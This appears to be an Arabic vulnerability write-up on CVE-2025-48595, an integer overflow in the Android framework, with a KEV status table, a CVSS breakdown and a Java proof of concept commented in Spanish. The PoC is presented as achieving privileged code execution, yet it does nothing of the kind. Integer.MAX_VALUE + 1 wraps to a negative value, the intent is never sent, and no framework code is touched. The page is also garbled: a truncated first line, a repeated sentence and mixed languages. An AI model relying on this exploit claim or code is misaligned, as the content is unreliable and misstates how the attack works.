
VE-2025-48595 هي ثغرة **فيضان عدد صحيح (integer overflow)** في مواقع متعددة من إطار عمل Android.
CVE-2025-48595 هي ثغرة تجاوز عدد صحيح (integer overflow) في عدة مواقع من إطار عمل أندرويد. يسمح هذا الخلل بتنفيذ كود يؤدي إلى تصعيد امتيازات محلي دون الحاجة إلى امتيازات تنفيذ إضافية. لا يتطلب الاستغلال تفاعل المستخدم.
| العنصر | الحالة |
|---|---|
| استغلال نشط | ✅ مؤكد (استغلال محدود ومجزأ) |
| في كتالوج KEV الخاص بـ CISA | ✅ نعم |
| تاريخ الإضافة إلى KEV | 2026-06-02 |
| تاريخ الانتهاء | 2026-06-05 |
| التصحيح متاح | ✅ نعم |
| إصدار أندرويد | هل هو متأثر؟ |
|---|---|
| Android 14 | ✅ نعم |
| Android 15 | ✅ نعم |
| Android 16 | ✅ نعم |
| Android 16 QPR2 | ✅ نعم |
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
text
يوضح الكود التالي استغلال الثغرة عن طريق إرسال بيانات خبيثة تسبب تجاوز عدد صحيح في إطار عمل أندرويد، مما يسمح بتنفيذ كود عشوائي بامتيازات مرتفعة.
// POC - CVE-2025-48595
// Android Framework Integer Overflow Vulnerability
// Uso: Compilar y ejecutar en dispositivo Android vulnerable
package com.example.cve202548595;
import android.app.Activity;
import android.os.Bundle;
import android.util.Log;
public class MainActivity extends Activity {
private static final String TAG = "CVE-2025-48595";
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
// POC: Desencadenar desbordamiento de entero
triggerIntegerOverflow();
}
private void triggerIntegerOverflow() {
try {
// Valor que causa el desbordamiento (más allá del límite esperado)
int maliciousValue = Integer.MAX_VALUE + 1;
// Construir intent malicioso
android.content.Intent intent = new android.content.Intent();
intent.putExtra("malicious_data", maliciousValue);
// Forzar operación con desbordamiento
int result = processMaliciousData(maliciousValue);
Log.i(TAG, "Desbordamiento activado exitosamente");
} catch (Exception e) {
Log.e(TAG, "Error: " + e.getMessage());
}
}
private int processMaliciousData(int value) {
// El desbordamiento aquí permite la corrupción de memoria
int[] buffer = new int[1024];
// El valor malicioso excede los límites del buffer
// debido al desbordamiento de entero
for (int i = 0; i < value; i++) {
buffer[i] = i; // Esta línea causa overflow
}
return buffer[0];
}
}
| المقياس | القيمة |
|---|
| ناقل الهجوم | محلي (AV:L) |
| تعقيد الهجوم | منخفض (AC:L) |
| الامتيازات المطلوبة | لا شيء (PR:N) |
| تفاعل المستخدم | لا شيء (UI:N) |
| التأثير على السرية | عالي (C:H) |
| التأثير على السلامة | عالي (I:H) |
| التأثير على التوفر | عالي (A:H) |